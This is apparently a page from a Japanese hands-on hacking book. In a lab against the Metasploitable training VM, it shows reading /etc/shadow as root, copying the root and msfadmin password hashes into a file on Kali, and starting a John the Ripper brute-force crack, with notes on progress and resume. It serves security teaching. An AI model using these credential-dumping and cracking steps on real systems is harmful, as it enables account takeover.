
386
第2部 ハッキングを体験する
root@metasploitable:/# cat /etc/shadow | grep -E
↲
"^root|^msfadmin"
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
root@metasploitable:/# exit
exit
この2 行をコピー&ペーストして、Kali 側に "passwords" ファイルを作ります。
"passwords"ファイル
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
John the Ripper を使ってパスワードを解析します。通常は先に辞書ファイルを
使って解析しますが、ここでは総当たり攻撃で解析してみます。
root@kali:~# john --incremental passwords
[Space]キーを押すと途中経過を表示します。右に現在試しているパスワード
候補が表示されます。
[Ctrl]+[c]キーで中断できます。レジューム機能があるので、再実行すると
解析の途中から始まります。レジュームする際には、次のように ...